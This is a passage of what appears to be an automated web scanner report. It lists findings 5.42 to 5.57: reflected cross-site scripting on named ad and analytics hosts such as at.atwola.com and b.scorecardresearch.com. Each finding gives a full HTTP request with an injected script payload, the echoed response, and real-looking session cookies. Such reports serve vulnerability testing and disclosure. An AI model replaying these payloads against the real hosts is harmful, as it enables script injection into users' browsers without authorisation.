Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0fc88c"><script>alert(1)</script>11931b329c4/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

5.42. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68953"><script>alert(1)</script>6729eb7dd53 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.168953"><script>alert(1)</script>6729eb7dd53/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.168953"><script>alert(1)</script>6729eb7dd53/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

5.43. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc56b"><script>alert(1)</script>f3885e3ce75 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794cc56b"><script>alert(1)</script>f3885e3ce75/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794cc56b"><script>alert(1)</script>f3885e3ce75/0/-1/size=300x250;adiframe=y">
...[SNIP]...

5.44. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aa31"><script>alert(1)</script>17fbae92a91 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/04aa31"><script>alert(1)</script>17fbae92a91/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/04aa31"><script>alert(1)</script>17fbae92a91/-1/size=300x250;adiframe=y">
...[SNIP]...

5.45. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9c97"><script>alert(1)</script>d52ab365ef1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1c9c97"><script>alert(1)</script>d52ab365ef1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1c9c97"><script>alert(1)</script>d52ab365ef1/size=300x250;adiframe=y">
...[SNIP]...

5.46. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b4de"><script>alert(1)</script>118786fa1f1 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size7b4de"><script>alert(1)</script>118786fa1f1=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size7b4de"><script>alert(1)</script>118786fa1f1=300x250;adiframe=y">
...[SNIP]...

5.47. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b2c3"><script>alert(1)</script>8a7aa19fc65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250?3b2c3"><script>alert(1)</script>8a7aa19fc65=1 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 232

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250?3b2c3"><script>alert(1)</script>8a7aa19fc65=1;adiframe=y">
...[SNIP]...

5.48. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c25"><script>alert(1)</script>e067740386f was submitted in the noperf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=99c25"><script>alert(1)</script>e067740386f HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=; Axxd=1; AxData=1#50085|52841|50963|50507|50086; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 245

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=99c25"><script>alert(1)</script>e067740386f;adiframe=y">
...[SNIP]...

5.49. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload d2060<script>alert(1)</script>a92a3305e16 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8d2060<script>alert(1)</script>a92a3305e16&c2=2113&c3=20&c4=4837&c5=34872&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8d2060<script>alert(1)</script>a92a3305e16", c2:"2113", c3:"20", c4:"4837", c5:"34872", c6:"", c10:"205196", c15:"", c16:"", r:""});



5.50. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 915f9<script>alert(1)</script>521310be6bf was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=34872&c6=&c10=205196915f9<script>alert(1)</script>521310be6bf&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
th-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"34872", c6:"", c10:"205196915f9<script>alert(1)</script>521310be6bf", c15:"", c16:"", r:""});



5.51. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload d9079<script>alert(1)</script>19388ce5eb8 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=34872&c6=&c10=205196&c15=d9079<script>alert(1)</script>19388ce5eb8 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"34872", c6:"", c10:"205196", c15:"d9079<script>alert(1)</script>19388ce5eb8", c16:"", r:""});



5.52. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 1ffa1<script>alert(1)</script>a6c0eeea5f1 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=21131ffa1<script>alert(1)</script>a6c0eeea5f1&c3=20&c4=4837&c5=34872&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"21131ffa1<script>alert(1)</script>a6c0eeea5f1", c3:"20", c4:"4837", c5:"34872", c6:"", c10:"205196", c15:"", c16:"", r:""});



5.53. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 93274<script>alert(1)</script>f68b1f5e88b was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=2093274<script>alert(1)</script>f68b1f5e88b&c4=4837&c5=34872&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"2093274<script>alert(1)</script>f68b1f5e88b", c4:"4837", c5:"34872", c6:"", c10:"205196", c15:"", c16:"", r:""});



5.54. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 85f3a<script>alert(1)</script>fd4bc89f66e was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=483785f3a<script>alert(1)</script>fd4bc89f66e&c5=34872&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"483785f3a<script>alert(1)</script>fd4bc89f66e", c5:"34872", c6:"", c10:"205196", c15:"", c16:"", r:""});



5.55. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 1983e<script>alert(1)</script>b250d769c8e was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=348721983e<script>alert(1)</script>b250d769c8e&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"348721983e<script>alert(1)</script>b250d769c8e", c6:"", c10:"205196", c15:"", c16:"", r:""});



5.56. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 9428f<script>alert(1)</script>87b9579e419 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=34872&c6=9428f<script>alert(1)</script>87b9579e419&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"34872", c6:"9428f<script>alert(1)</script>87b9579e419", c10:"205196", c15:"", c16:"", r:""});



5.57. http://bid.openx.net/json [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 4d8c4<script>alert(1)</script>fd80bf050f8 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

